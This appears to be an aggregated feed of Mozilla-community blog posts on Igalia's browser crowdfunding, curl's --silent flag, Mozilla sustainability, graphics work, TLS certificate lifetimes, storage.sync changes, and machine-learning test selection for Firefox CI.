Frédéric WangIgalia's contribution to the Mozilla project and Open Prioritization

As many web platform developer and Firefox users, I believe Mozilla’s mission is instrumental for a better Internet. In a recent Igalia’s chat about the Web Ecosystem Health, participants made the usual observation regarding this important role played by Mozilla on the one hand and the limited development resources and small Firefox’s usage share on the other hand. In this blog post, I’d like to explain an experimental idea we are launching at Igalia to try and make browser development better match the interest of the web developer and user community.

Open Prioritization by Igalia. An experiment in crowd-funding prioritization.

Igalia’s contribution to browser repositories

As mentioned in the past in this blog, Igalia has contributed to different part of Firefox such as multimedia (e.g. <video> support), layout (e.g. Stylo, WebRender, CSS, MathML), scripts (e.g. BigInt, WebAssembly) or accessibility (e.g. ARIA). But is it enough?

Although commit count is an imperfect metric it is also one of the easiest to obtain. Let’s take a look at how Igalia’s commits repositories of the Chromium (chromium, v8), Mozilla (mozilla-central, servo, servo-web-render) and WebKit projects were distributed last year:

pie chart <figcaption>Diagram showing, the distribution of Igalia's contributions to browser repositories in 2019 (~5200 commits). Chromium (~73%), Mozilla (~4%) and WebKit (~23%). </figcaption>

As you can see, in absolute value Igalia contributed roughly 3/4 to Chromium, 1/4 to WebKit, with a small remaining amount to Mozilla. This is not surprising since Igalia is a consulting company and our work depends on the importance of browsers in the market where Chromium dominates and WebKit is also quite good for iOS devices and embedded systems.

This suggests a different way to measure our contribution by considering, for each project, the percentage relative to the total amount of commits:

Bar graph <figcaption>Diagram showing, for each project, the percentage of Igalia's commits in 2019 relative to the total amount of the project. From left to right: Chromium (~3.96%), Mozilla (~0.43%) and WebKit (~10.92%). </figcaption>

In the WebKit project, where ~80% of the contributions were made by Apple, Igalia was second with ~10% of the total. In the Chromium project, the huge Google team made more than 90% of the contributions and many more companies are involved, but Igalia was second with about 4% of the total. In the Mozilla project, Mozilla is also doing ~90% of the contributions but Igalia only had ~0.5% of the total. Interestingly, the second contributing organization was… the community of unindentified gmail.com addresses! Of course, this shows the importance of volunteers in the Mozilla project where a great effort is done to encourage participation.

Open Prioritization

From the commit count, it’s clear Igalia is not contributing as much to the Mozilla project as to Chromium or WebKit projects. But this is expected and is just reflecting the priority set by large companies. The solid base of Firefox users as well as the large amount of volunteer contributors show that the Mozilla project is nevertheless still attractive for many people. Could we turn this into browser development that is not funded by advertising or selling devices?

Another related question is whether the internet can really be shaped by the global community as defended by the Mozilla’s mission? Is the web doomed to be controlled by big corporations doing technology’s “evangelism” or lobbying at standardization committees? Are there prioritization issues that can be addressed by moving to a more collective decision process?

At Igalia, we internally try and follow a more democratic organization and, at our level, intend to make the world a better place. Today, we are launching a new Open Prioritization experiment to verify whether crowdfunding could be a way to influence how browser development is prioritized. Below is a short (5 min) introductory video:

I strongly recommend you to take a look at the proposed projects and read the FAQ to understand how this is going to work. But remember this is an experiment so we are starting with a few ideas that we selected and tasks that are relatively small. We know there are tons of user reports in bug trackers and suggestions of standards, but we are not going to solve everything in one day !

If the process is successful, we can consider generalizing this approach, but we need to test it first, check what works and what doesn’t, consider whether it is worth pursuing, analyze how it can be improved, etc

Two Crowdfunding Tasks for Firefox

CIELAB color space* <figcaption>Representation of the CIELAB color space (top view) by Holger Everding, under CC-SA 4.0. </figcaption>

As explained in the previous paragraph, we are starting with small tasks. For Firefox, we selected the following ones:

  • CSS lab() colors. This is about giving web developers a way to express colors using the CIELAB color space which approximates better the human perception. My colleague Brian Kardell wrote a blog with more details. Some investigations have been made by Apple and Google. Let’s see what we can do for Firefox !

  • SVG path d attribute. This is about expressing SVG path using the corresponding CSS syntax for example <path style="d: path('M0,0 L10,10,...')">. This will likely involve a refactoring to use the same parser for both SVG and CSS paths. It’s a small feature but part of a more general convergence effort between SVG and CSS that Igalia has been involved in.

Conclusion

Is this crowd-funded experiment going to work? Can this approach solve the prioritization problems or at least help a bit? How can we improve that idea in the future?…

There are many open questions but we will only be able to answer them if we have enough people participating. I’ll personally pledge for the two Firefox projects and I invite you to at least take a look and decide whether there is something there that is interesting for you. Let’s try and see!

Daniel Stenbergcurl ootw: –silent

Previous options of the week.

--silent (-s) existed in curl already in the first ever version released: 4.0.

Silent by default

I’ve always enjoyed the principles of Unix command line tool philosophy and I’ve tried to stay true to them in the design and implementation of the curl command line tool: everything is a pipe, don’t “speak” more than necessary by default.

As a result of the latter guideline, curl features the --verbose option if you prefer it to talk and explain more about what’s going on. By default – when everything is fine – it doesn’t speak much extra.

Initially: two things were “spoken”

To show users that something is happening during a command line invoke that takes a long time, we added a “progress meter” display. But since you can also ask curl to output text or data in the terminal, curl has logic to automatically switch off the progress meter display to avoid content output to get mixed with it.

Of course we very quickly figured out that there are also other use cases where the progress meter was annoying so we needed to offer a way to shut it off. To keep silent! --silent was the obvious choice for option name and -s was conveniently still available.

The other thing that curl “speaks” by default is the error message. If curl fails to perform the transfer or operation as asked to, it will output a single line message about it when it is done, and then return an error code.

When we added an option called --silent to make curl be truly silent, we also made it hush the error message. curl still returns an error code, so shell scripts and similar environments that invoke curl can still detect errors perfectly fine. Just possibly slightly less human friendly.

But I want my errors?

In May 1999, the tool was just fourteen months old, we added --show-error (-S) for users that wanted to curl to be quiet in general but still wanted to see the error message in case it failed. The -Ss combination has been commonly used ever since.

More information added

Over time we’ve made the tool more complex and we’ve felt that it needs some more informational output in some cases. For example, when you use --retry, curl will say something that it will try again etc. The reason is of course that --verbose is really verbose so its not really the way to ask for such little extra helpful info.

Only shut off the progress meter

Not too long ago, we ended up with a new situation where the --silent option is a bit too silent since it also disables the text for retry etc so what if you just want to shut off the progress meter?

--no-progress-meter was added for that, which thus is a modern replacement for --silent in many cases.

The Mozilla BlogSustainability needs culture change. Introducing Environmental Champions.

Sustainability is not just about ticking a few boxes by getting your Greenhouse Gas emissions (GHG) inventory, adopting goals for reduction and mitigation, and accounting in shape. Any transformation towards sustainability also needs culture change.

In launching Mozilla‘s Sustainability Programme, our Environmental Champions are a key part of driving this organisational culture change.

Recruiting, training, and working with a first cohort of Environmental Champions has been a highlight of my job in the last couple of months. I can’t wait to see their initiatives taking root across all parts of Mozilla.

We have 14 passionate and driven individuals in this first cohort. They are critical amplifiers who will nudge each and every one us to incorporate sustainability into everything we do.

 

What makes people Champions?

“We don’t need hope, we need courage: The courage to change and impact our own decisions.”

This was among the top take-aways of our initial level-setting workshop on climate change science. In kicking off conversations around how to adjust our everyday work at Mozilla to a more sustainability-focused mindset, it was clear that hope won’t get us to where we need to be. This will require boldness and dedication.

Our champions volunteer their time for this effort. All of them have full-time roles and it was important to structure this process so that it is inviting, empowering, and impactful. To me this meant ensuring manager buy-in and securing executive sponsorship to make sure that our champions have the support to grow professionally in their sustainability work.

In the selection of this cohort, we captured the whole breadth of Mozilla: representatives from all departments, spread across regions, including office as well as remote workers, people with different tenure and job levels, and a diversity in roles. Some are involved with our GHG assessment, others are design thinkers, engineers, or programme managers, and yet others will focus on external awareness raising.

 

Responsibilities and benefits

In a nutshell, we agreed on these conditions:

Environmental Champions are:

  • Engaged through a peer learning platform with monthly meetings for all champions, including occasional conversations with sustainability experts. We currently alternate between four time zones, starting at 8am CEST (UTC+2), CST (UTC+8), EDT (UTC-4), PDT (UTC-7), respectively to equally spread the burden of global working hours.
  • Committed to spend about 2-5h each month supporting sustainability efforts at Mozilla.
  • Committed to participate in at least 1 initiative a year.
  • Committed to regularly share initiatives they are driving or participating in.
  • Dedicated to set positive examples and highlight sustainability as a catalyst of innovation.
  • Set up to provide feedback in their teams/departments, raise questions and draw attention to sustainability considerations.

The Sustainability team:

  • Provides introductory training on climate science and how to incorporate it into our everyday work at Mozilla. Introductory training will be provided at least once a year or as soon as we have a critical mass of new champions joining us on this journey.
  • Commits to inviting champions for initial feedback on new projects, e.g. sustainability policy, input on reports, research to be commissioned.
  • Regularly amplifies progress and successes of champions’ initiatives to wider staff.
  • May offer occasional access to consultants, support for evangelism (speaking, visibility, support for professional development) or other resources, where necessary and to the extent possible.

 

Curious about their initiatives?

We are just setting out and we already have a range of ambitious, inspiring projects lined up.

Sharmili, our Global Space Planner, is not only gathering necessary information around the impact of our global office spaces, she will also be leading on our reduction targets for real estate and office supplies. She puts it like this: “Reducing our Real Estate Footprint and promoting the 3 R’s (reduce, reuse, recycle) is as straight-forward as it can be tough in practice. We’ll make it happen either way.”

Ian, a machine learning engineer, is looking at Pocket recommendation guidelines and is keen to see more collections like this Earth Day 2020 one in the future.

Daria, Head of Product Design in Emerging Technologies, says: “There are many opportunities for designers to develop responsible technologies and to bring experiences that prioritize sustainability principles. It’s time we unlocked them.” She is planning to develop and apply a Sustainability Impact Assessment Tool that will be used in decision-making around product design and development.

We’ll also be looking at Firefox performance and web power usage, starting with explorations for how to better measure the impact of our products. DOM engineer, Olli will be stewarding these.

And the behind the scenes editorial support thinking through content, timing, and outreach? That’s Daniel for you.

We’ll be sharing more initiatives and the progress they are all making as we move forward. In the meantime, do join us on our Matrix channel to continue the conversation.

The post Sustainability needs culture change. Introducing Environmental Champions. appeared first on The Mozilla Blog.

Mozilla GFXmoz://gfx newsletter #53

Bonjour à tous et à toutes, this is episode 53 of your favorite and only Firefox graphics newsletter. From now on instead of peeling through commit logs, I will be simply gathering notes sent to me by the rest of the team. This means the newsletter will be shorter, hopefully a bit less overwhelming with only the juicier bits. It will also give yours-truly more time to fix bugs instead of writing about it.

Lately we have been enabling WebRender for a lot more users. For the first time, WebRender is enabled by default in Nightly for Windows 7 and macOS users with modern GPUs. Today 78% of Nightly users have WebRender enabled, 40% on beta, and 22% on release. Not all of these configurations are ready to ride the trains yet, but the numbers are going to keep going up over the next few releases.

WebRender

WebRender is a GPU based 2D rendering engine for the web written in Rust, currently powering Firefox‘s rendering engine as well as Mozilla’s research web browser Servo.

Ongoing work

  • Part of the team is now focusing on shipping WebRender on some flavors of Linux as well.
  • Worth highlighting also is the ongoing work by Martin Stránský and Robert Madder to switch Firefox on Linux from GLX to EGL. EGL is a more modern and better supported API, it will also let us share more code between Linux and Android.
  • Lee and Jim continue work on WebRender’s software backend. It has had a bunch of correctness improvements, works properly on Windows now and has more performance improvements in the pipeline. It works on all desktop platforms and can be enabled via the pref “gfx.webrender.software”.

Performance

One of the projects that we worked on the last little while has been improving performance on lower-end/older Intel GPUs.

  • Glenn fixed a picture caching issue while scrolling gmail
  • Glenn fixed some over-invalidation on small screen resolutions.
  • Glenn reduced extra invalidation some more.
  • Dzmitry switched WebRender to a different CPU-to-GPU transfer strategy on Intel hardware on Windows. This avoid stalls during rendering.

Some other performance improvements that we made are:

  • Nical reduced CPU usage by re-building the scene a lot less often during scrolling.
  • Nical removed a lot of costly vector reallocation during scene building.
  • Nical reduced the amount of synchronous queries submitted to the X server on Linux, removing a lot of stalls when the GPU busy.
  • Nical landed a series of frame building optimizations.
  • Glenn improved texture cache eviction handling. This means lower memory usage and better performance.
  • Jeff enabled GPU switching for WebRender on Mac in Nightly. Previously WebRender only used the GPU that Firefox was started with. If the GPU was switched Firefox would have very bad performance because we would be drawing with the wrong GPU.
  • Markus finished and preffed on the OS compositor configuration of WR on macOS, which uses CoreAnimation for efficient scrolling.

Driver bugs

  • Dzmitry worked around a driver bug causing visual artifacts in Firefox’s toolbar on Intel Skylake and re-enabled direct composition on these configurations.

Desktop zooming

  • Botond announced on dev-platform that desktop zooming is ready for dogfooding by Nightly users who would like to try it out by flipping the pref.
  • Botond landed a series of patches that re-works how main-thread hit testing accounts for differences between the visual and layout viewports. This fixes a number of scenarios involving the experimental desktop zooming feature (enabled using apz.allow_zooming=true), including allowing scrollbars to be dragged with desktop zooming enabled.
  • Timothy landed support for DirectManipulation preffed off. It allows users to pinch-zoom on touchpads on Windows. It can be enabled by setting apz.windows.use_direct_manipulation=true

The Mozilla BlogThank you, Julie Hanna

Over the last three plus years, Julie Hanna has brought extensive experience on innovation processes, global business operations, and mission-driven organizations to her role as a board member of Mozilla Corporation. We have deeply appreciated her contributions to Mozilla throughout this period, and thank her for her time and her work with the board.

Julie is now stepping back from her board commitment at Mozilla Corporation to focus more fully on her longstanding passion and mission to help pioneer and bring to market technologies that meaningfully advance social, economic and ecological justice, as evidenced by her work with Kiva, Obvious Ventures and X (formerly Google X), Alphabet’s Moonshot Factory. We look forward to continuing to see her play a key role in shaping and evolving purpose-driven technology companies across industries.

We are actively looking for a new member to join the board and seeking candidates with a range of backgrounds and experiences.

The post Thank you, Julie Hanna appeared first on The Mozilla Blog.

Mozilla Open Policy & Advocacy BlogLaws designed to protect online security should not undermine it

Mozilla, Atlassian, and Shopify yesterday filed a friend-of-the-court brief in Van Buren v. U.S. asking the U.S. Supreme Court to consider implications of the Computer Fraud and Abuse Act for online security and privacy.

Mozilla’s involvement in this case comes from our interest in making sure that the law doesn’t stand in the way of effective online security. The Computer Fraud and Abuse Act (CFAA) was passed as a tool to combat online hacking through civil and criminal liability. However, over the years various federal circuit courts have interpreted the law so broadly as to threaten important practices for managing computer security used by Mozilla and many others. Contrary to the purpose of the statute, the lower court’s decision in this case would take a law meant to increase security and interpret it in a way that undermines that goal.

System vulnerabilities are common among even the most security conscious platforms. Finding and addressing as many of these vulnerabilities as possible relies on reporting from independent security researchers who probe and test our network. In fact, Mozilla was one of the first to offer a bug bounty program with financial rewards specifically for the purpose of encouraging external researchers to report vulnerabilities to us so we can fix them before they become widely known. By sweeping in pro-security research activities, overbroad readings of the CFAA discourage independent investigation and reporting of security flaws. The possibility of criminal liability as well as civil intensifies that chilling effect.

We encourage the Supreme Court to protect strong cybersecurity by striking the lower court’s overbroad statutory interpretation.

The post Laws designed to protect online security should not undermine it appeared first on Open Policy & Advocacy.

Mozilla Addons BlogChanges to storage.sync in Firefox 79

Firefox 79, which will be released on July 28, includes changes to the storage.sync area. Items that extensions store in this area are automatically synced to all devices signed in to the same Firefox Account, similar to how Firefox Sync handles bookmarks and passwords. The storage.sync area has been ported to a new Rust-based implementation, allowing extension storage to share the same infrastructure and backend used by Firefox Sync.

Extension data that had been stored locally in existing profiles will automatically migrate the first time an installed extension tries to access storage.sync data in Firefox 79. After the migration, the data will be stored locally in a new storage-sync2.sqlite file in the profile directory.

If you are the developer of an extension that syncs extension storage, you should be aware that the new implementation now enforces client-side quota limits. This means that:

  • You can make a call using storage.sync.GetBytesInUse to estimate how much data your extension is storing locally over the limit.
  • If your extension previously stored data above quota limits, all that data will be migrated and available to your extension, and will be synced. However, attempting to add new data will fail.
  • If your extension tries to store data above quota limits, the storage.sync API call will raise an error. However, the extension should still successfully retrieve existing data.

We encourage you to use the Firefox Beta channel to test all extension features that use the storage.sync API to see how they behave if the client-side storage quota is exceeded before Firefox 79 is released. If you notice any regressions, please check your about:config preferences to ensure that webextensions.storage.sync.kinto is set to false and then file a bug. We do not recommend flipping this preference to true as doing so may result in data loss.

If your users report that their extension data does not sync after they upgrade to Firefox 79, please also file a bug. This is likely related to the storage.sync data migration.

Please let us know if there are any questions on our developer community forum.

The post Changes to storage.sync in Firefox 79 appeared first on Mozilla Add-ons Blog.

Mozilla Security BlogReducing TLS Certificate Lifespans to 398 Days

We intend to update Mozilla’s Root Store Policy to reduce the maximum lifetime of TLS certificates from 825 days to 398 days, with the aim of protecting our user’s HTTPS connections. Many reasons for reducing the lifetime of certificates have been provided and summarized in the CA/Browser Forum’s Ballot SC22. Here are Mozilla’s top three reasons for supporting this change.

1. Agility

Certificates with lifetimes longer than 398 days delay responding to major incidents and upgrading to more secure technology. Certificate revocation is highly disruptive and difficult to plan for. Certificate expiration and renewal is the least disruptive way to replace an obsolete certificate, because it happens at a pre-scheduled time, whereas revocation suddenly causes a site to stop working. Certificates with lifetimes of no more than 398 days help mitigate the threat across the entire ecosystem when a major incident requires certificate or key replacements. Additionally, phasing out certificates with MD5-based signatures took five years, because TLS certificates were valid for up to five years. Phasing out certificates with SHA-1-based signatures took three years, because the maximum lifetime of TLS certificates was three years. Weakness in hash algorithms can lead to situations in which attackers can forge certificates, so users were at risk for years after collision attacks against these algorithms were proven feasible.

2. Limit exposure to compromise

Keys valid for longer than one year have greater exposure to compromise, and a compromised key could enable an attacker to intercept secure communications and/or impersonate a website until the TLS certificate expires. A good security practice is to change key pairs frequently, which should happen when you obtain a new certificate. Thus, one-year certificates will lead to more frequent generation of new keys.

3. TLS Certificates Outliving Domain Ownership

TLS certificates provide authentication, meaning that you can be sure that you are sending information to the correct server and not to an imposter trying to steal your information. If the owner of the domain changes or the cloud service provider changes, the holder of the TLS certificate’s private key (e.g. the previous owner of the domain or the previous cloud service provider) can impersonate the website until that TLS certificate expires. The Insecure Design Demo site describes two problems with TLS certificates outliving their domain ownership:

  • “If a company acquires a previously owned domain, the previous owner could still have a valid certificate, which could allow them to MitM the SSL connection with their prior certificate.”
  • “If a certificate has a subject alt-name for a domain no longer owned by the certificate user, it is possible to revoke the certificate that has both the vulnerable alt-name and other domains. You can DoS the service if the shared certificate is still in use!”

The change to reduce the maximum validity period of TLS certificates to 398 days is being discussed in the CA/Browser Forum’s Ballot SC31 and can have two possible outcomes:

     a) If that ballot passes, then the requirement will automatically apply to Mozilla’s Root Store Policy by reference.

     b) If that ballot does not pass, then we intend to proceed with our regular process for updating Mozilla’s Root Store Policy, which will involve discussion in mozilla.dev.security.policy.

In preparation for updating our root store policy, we surveyed all of the certificate authorities (CAs) in our program and found that they all intend to limit TLS certificate validity periods to 398 days or less by September 1, 2020.

We believe that the best approach to safeguarding secure browsing is to work with CAs as partners, to foster open and frank communication, and to be diligent in looking for ways to keep our users safe.

The post Reducing TLS Certificate Lifespans to 398 Days appeared first on Mozilla Security Blog.

Hacks.Mozilla.OrgTesting Firefox more efficiently with machine learning

A browser is an incredibly complex piece of software. With such enormous complexity, the only way to maintain a rapid pace of development is through an extensive CI system that can give developers confidence that their changes won’t introduce bugs. Given the scale of our CI, we’re always looking for ways to reduce load while maintaining a high standard of product quality. We wondered if we could use machine learning to reach a higher degree of efficiency.

Continuous integration at scale

At Mozilla we have around 50,000 unique test files. Each contain many test functions. These tests need to run on all our supported platforms (Windows, Mac, Linux, Android) against a variety of build configurations (PGO, debug, ASan, etc.), with a range of runtime parameters (site isolation, WebRender, multi-process, etc.).

While we don’t test against every possible combination of the above, there are still over 90 unique configurations that we do test against. In other words, for each change that developers push to the repository, we could potentially run all 50k tests 90 different times. On an average work day we see nearly 300 pushes (including our testing branch). If we simply ran every test on every configuration on every push, we’d run approximately 1.35 billion test files per day! While we do throw money at this problem to some extent, as an independent non-profit organization, our budget is finite.

So how do we keep our CI load manageable? First, we recognize that some of those ninety unique configurations are more important than others. Many of the less important ones only run a small subset of the tests, or only run on a handful of pushes per day, or both. Second, in the case of our testing branch, we rely on our developers to specify which configurations and tests are most relevant to their changes. Third, we use an integration branch.

Basically, when a patch is pushed to the integration branch, we only run a small subset of tests against it. We then periodically run everything and employ code sheriffs to figure out if we missed any regressions. If so, they back out the offending patch. The integration branch is periodically merged to the main branch once everything looks good.

Example of a mozilla-central push on TreeherderA subset of the tasks we run on a single mozilla-central push. The full set of tasks were too hard to distinguish when scaled to fit in a single image.

A new approach to efficient testing

These methods have served us well for many years, but it turns out they’re still very expensive. Even with all of these optimizations our CI still runs around 10 compute years per day! Part of the problem is that we have been using a naive heuristic to choose which tasks to run on the integration branch. The heuristic ranks tasks based on how frequently they have failed in the past. The ranking is unrelated to the contents of the patch. So a push that modifies a README file would run the same tasks as a push that turns on site isolation. Additionally, the responsibility for determining which tests and configurations to run on the testing branch has shifted over to the developers themselves. This wastes their valuable time and tends towards over-selection of tests.

About a year ago, we started asking ourselves: how can we do better? We realized that the current implementation of our CI relies heavily on human intervention. What if we could instead correlate patches to tests using historical regression data? Could we use a machine learning algorithm to figure out the optimal set of tests to run? We hypothesized that we could simultaneously save money by running fewer tests, get results faster, and reduce the cognitive burden on developers. In the process, we would build out the infrastructure necessary to keep our CI pipeline running efficiently.

Having fun with historical failures

The main prerequisite to a machine-learning-based solution is collecting a large and precise enough regression dataset. On the surface this appears easy. We already store the status of all test executions in a data warehouse called ActiveData. But in reality, it’s very hard to do for the reasons below.

Since we only run a subset of tests on any given push (and then periodically run all of them), it’s not always obvious when a regression was introduced. Consider the following scenario:

Test A Test B
Patch 1 PASS PASS
Patch 2 FAIL NOT RUN
Patch 3 FAIL FAIL

It is easy to see that the “Test A” failure was regressed by Patch 2, as that’s where it first started failing. However with the “Test B” failure, we can’t really be sure. Was it caused by Patch 2 or 3? Now imagine there are 8 patches in between the last PASS and the first FAIL. That adds a lot of uncertainty!

Intermittent (aka flaky) failures also make it hard to collect regression data. Sometimes tests can both pass and fail on the same codebase for all sorts of different reasons. It turns out we can’t be sure that Patch 2 regressed “Test A” in the table above after all! That is unless we re-run the failure enough times to be statistically confident. Even worse, the patch itself could have introduced the intermittent failure in the first place. We can’t assume that just because a failure is intermittent that it’s not a regression.

Futurama Fry not sure if memeThe writers of this post having a hard time.

Our heuristics

In order to solve these problems, we have built quite a large and complicated set of heuristics to predict which regressions are caused by which patch. For example, if a patch is later backed out, we check the status of the tests on the backout push. If they’re still failing, we can be pretty sure the failures were not due to the patch. Conversely, if they start passing we can be pretty sure that the patch was at fault.

Some failures are classified by humans. This can work to our advantage. Part of the code sheriff’s job is annotating failures (e.g. “intermittent” or “fixed by commit” for failures fixed at some later point). These classifications are a huge help finding regressions in the face of missing or intermittent tests. Unfortunately, due to the sheer number of patches and failures happening continuously, 100% accuracy is not attainable. So we even have heuristics to evaluate the accuracy of the classifications!

tweet from @MozSherifMemes "Today's menu: Intermittent code linting failures based on the same revision.Sheriffs complaining about intermittent failures.

Another trick for handling missing data is to backfill missing tests. We select tests to run on older pushes where they didn’t initially run, for the purpose of finding which push caused a regression. Currently, sheriffs do this manually. However, there are plans to automate it in certain circumstances in the future.

Collecting data about patches

We also need to collect data about the patches themselves, including files modified and the diff.  This allows us to correlate with the test failure data. In this way, the machine learning model can determine the set of tests most likely to fail for a given patch.

Collecting data about patches is way easier, as it is totally deterministic. We iterate through all the commits in our Mercurial repository, parsing patches with our rust-parsepatch project and analyzing source code with our rust-code-analysis project.

Designing the training set

Now that we have a dataset of patches and associated tests (both passes and failures), we can build a training set and a validation set to teach our machines how to select tests for us.

90% of the dataset is used as a training set, 10% is used as a validation set. The split must be done carefully. All patches in the validation set must be posterior to those in the training set. If we were to split randomly, we’d leak information from the future into the training set, causing the resulting model to be biased and artificially making its results look better than they actually are.

For example, consider a test which had never failed until last week and has failed a few times since then. If we train the model with a randomly picked training set, we might find ourselves in the situation where a few failures are in the training set and a few in the validation set. The model might be able to correctly predict the failures in the validation set, since it saw some examples in the training set.

In a real-world scenario though, we can’t look into the future. The model can’t know what will happen in the next week, but only what has happened so far. To evaluate properly, we need to pretend we are in the past, and future data (relative to the training set) must be inaccessible.

Diagram showing scale of training set (90%) to validation set (10%).Visualization of our split between training and validation set.

Building the model

We train an XGBoost model, using features from both test, patch, and the links between them, e.g:

  • In the past, how often did this test fail when the same files were touched?
  • How far in the directory tree are the source files from the test files?
  • How often in the VCS history were the source files modified together with the test files?

Full view of the model training infrastructure.

The input to the model is a tuple (TEST, PATCH), and the label is a binary FAIL or NOT FAIL. This means we have a single model that is able to take care of all tests. This architecture allows us to exploit the commonalities between test selection decisions in an easy way. A normal multi-label model, where each test is a completely separate label, would not be able to extrapolate the information about a given test and apply it to another completely unrelated test.

Given that we have tens of thousands of tests, even if our model was 99.9% accurate (which is pretty accurate, just one error every 1000 evaluations), we’d still be making mistakes for pretty much every patch! Luckily the cost associated with false positives (tests which are selected by the model for a given patch but do not fail) is not as high in our domain, as it would be if say, we were trying to recognize faces for policing purposes. The only price we pay is running some useless tests. At the same time we avoided running hundreds of them, so the net result is a huge savings!

As developers periodically switch what they are working on the dataset we train on evolves. So we currently retrain the model every two weeks.

Optimizing configurations

After we have chosen which tests to run, we can further improve the selection by choosing where the tests should run. In other words, the set of configurations they should run on. We use the dataset we’ve collected to identify redundant configurations for any given test. For instance, is it really worth running a test on both Windows 7 and Windows 10? To identify these redundancies, we use a solution similar to frequent itemset mining:

  1. Collect failure statistics for groups of tests and configurations
  2. Calculate the “support” as the number of pushes in which both X and Y failed over the number of pushes in which they both run
  3. Calculate the “confidence” as the number of pushes in which both X and Y failed over the number of pushes in which they both run and only one of the two failed.

We only select configuration groups where the support is high (low support would mean we don’t have enough proof) and the confidence is high (low confidence would mean we had many cases where the redundancy did not apply).

Once we have the set of tests to run, information on whether their results are configuration-dependent or not, and a set of machines (with their associated cost) on which to run them; we can formulate a mathematical optimization problem which we solve with a mixed-integer programming solver. This way, we can easily change the optimization objective we want to achieve without invasive changes to the optimization algorithm. At the moment, the optimization objective is to select the cheapest configurations on which to run the tests.

For the mathematically inclined among you, an instance of the optimization problem for a theoretical situation with three tests and three configurations. Test 1 and Test 3 are fully platform-independent. Test 2 must run on configuration 3 and on one of configuration 1 or configuration 2.
Minimize
Subject to
And

Using the model

A machine learning model is only as useful as a consumer’s ability to use it. To that end, we decided to host a service on Heroku using dedicated worker dynos to service requests and Redis Queues to bridge between the backend and frontend. The frontend exposes a simple REST API, so consumers need only specify the push they are interested in (identified by the branch and topmost revision). The backend will automatically determine the files changed and their contents using a clone of mozilla-central.

Depending on the size of the push and the number of pushes in the queue to be analyzed, the service can take several minutes to compute the results. We therefore ensure that we never queue up more than a single job for any given push. We cache results once computed. This allows consumers to kick off a query asynchronously, and periodically poll to see if the results are ready.

We currently use the service when scheduling tasks on our integration branch. It’s also used when developers run the special mach try auto command to test their changes on the testing branch. In the future, we may also use it to determine which tests a developer should run locally.

Sequence diagram depicting the communication between the various actors in our infrastructure.

Measuring and comparing results

From the outset of this project, we felt it was crucial that we be able to run and compare experiments, measure our success and be confident that the changes to our algorithms were actually an improvement on the status quo. There are effectively two variables that we care about in a scheduling algorithm:

  1. The amount of resources used (measured in hours or dollars).
  2. The regression detection rate. That is, the percentage of introduced regressions that were caught directly on the push that caused them. In other words, we didn’t have to rely on a human to backfill the failure to figure out which push was the culprit.

We defined our metric:

scheduler effectiveness = 1000 * regression detection rate / hours per push

The higher this metric, the more effective a scheduling algorithm is. Now that we had our metric, we invented the concept of a “shadow scheduler”. Shadow schedulers are tasks that run on every push, which shadow the actual scheduling algorithm. Only rather than actually scheduling things, they output what they would have scheduled had they been the default. Each shadow scheduler may interpret the data returned by our machine learning service a bit differently. Or they may run additional optimizations on top of what the machine learning model recommends.

Finally we wrote an ETL to query the results of all these shadow schedulers, compute the scheduler effectiveness metric of each, and plot them all in a dashboard. At the moment, there are about a dozen different shadow schedulers that we’re monitoring and fine-tuning to find the best possible outcome. Once we’ve identified a winner, we make it the default algorithm. And then we start the process over again, creating further experiments.

Conclusion

The early results of this project have been very promising. Compared to our previous solution, we’ve reduced the number of test tasks on our integration branch by 70%! Compared to a CI system with no test selection, by almost 99%! We’ve also seen pretty fast adoption of our mach try auto tool, suggesting a usability improvement (since developers no longer need to think about what to select). But there is still a long way to go!

We need to improve the model’s ability to select configurations and default to that. Our regression detection heuristics and the quality of our dataset needs to improve. We have yet to implement usability and stability fixes to mach try auto.

And while we can’t make any promises, we’d love to package the model and service up in a way that is useful to organizations outside of Mozilla. Currently, this effort is part of a larger project that contains other machine learning infrastructure originally created to help manage Mozilla’s Bugzilla instance. Stay tuned!

If you’d like to learn more about this project or Firefox’s CI system in general, feel free to ask on our Matrix channel, #firefox-ci:mozilla.org.

The post Testing Firefox more efficiently with machine learning appeared first on Mozilla Hacks - the Web developer blog.

Karl DubostBrowser Wish List - Tabs Time Machine

Each time, when asking around you how many tabs are opened in the current desktop browser session, most people will have around per session (July 2020):

  • Release: 4 tabs (median) and 8 tabs (mean)
  • Nightly: 4 tabs (median) and 51 tabs (mean)

(Having a graph of the full distribution would be interesting here.)

It would be interesting to see the exact distribution, because there is a cohort with a very high number of tabs. I have usually in between 300 and 500 tabs opened. And sometimes I'm cleaning up everything. But after an internal discussion at Mozilla, I realized some people had even more toward a couple of thousand tabs opened at once.

While we are not the sheer majority, we are definitely a group of people probably working with browsers intensively and with specific needs that the browsers currently do not address. Also we have to be careful with these stats which are auto-selecting group of people. If there's nothing to manage a high number of tabs, it is then likely that there will not be a lot of people ready to painstakly manage a high number of tabs.

The Why?

I use a lot of tabs.

But if I turn my head to my bookshelf, there are probably around 2000+ books in there. My browser is a bookshelf or library of content and a desk. But one which is currently not very good at organizing my content. I keep tabs opened

  • to access reference content (articles, guidebook, etc)
  • to talk about it later on with someone else or in a blog post
  • to have access to tasks (opening 30 bugs I need to go through this week)

I sometimes open some tabs twice. I close by mistake a tab without realizing and then when I search the content again I can't find it. I can't do a full text search on all open tabs. I can only manage the tabs vertically with an addon (right now I'm using Tabs Center Redux). And if by any bad luck, we are offline and the tabs had not been navigated beforehand, we loose the full content we needed.

So I’m often grumpy at my browser.

What I want: Content Management

Here I will be focusing on my own use case and needs.

What I would love is an “Apple Time Machine”-like for my browser, aka dated archives of my browsing session, with full text search.

  • Search through text keyword all tabs content, not only the title.
  • Possibility to filter search queries with time and uri. "Search this keyword only on wikipedia pages opened less than one week ago"
  • Tag tabs to create collections of content.
  • Archive the same exact uri at different times. Imagine the homepage of the NYTimes at different dates or times and keeping each version locally. (Webarchive is incomplete and online, I want it to work offline).
  • The storage format doesn't need to be the full stack of technologies of the current page. Opera Mini for example is using a format which is compressing the page as a more or less interactive image with limited capabilities.
  • You could add automation with an automatic backup of everything you are browsing, or have the possibility to manually select the pages you want to keep (like when you decide to pin a tab)
  • If the current computer doesn't have enough storage for your needs, an encrypted (paid) service could be provided where you would specify which page you want to be archived away and the ones that you want to keep locally.

Firefox becomes a portable bookshelf and the desk with the piles of papers you are working on.

Browser Innovation

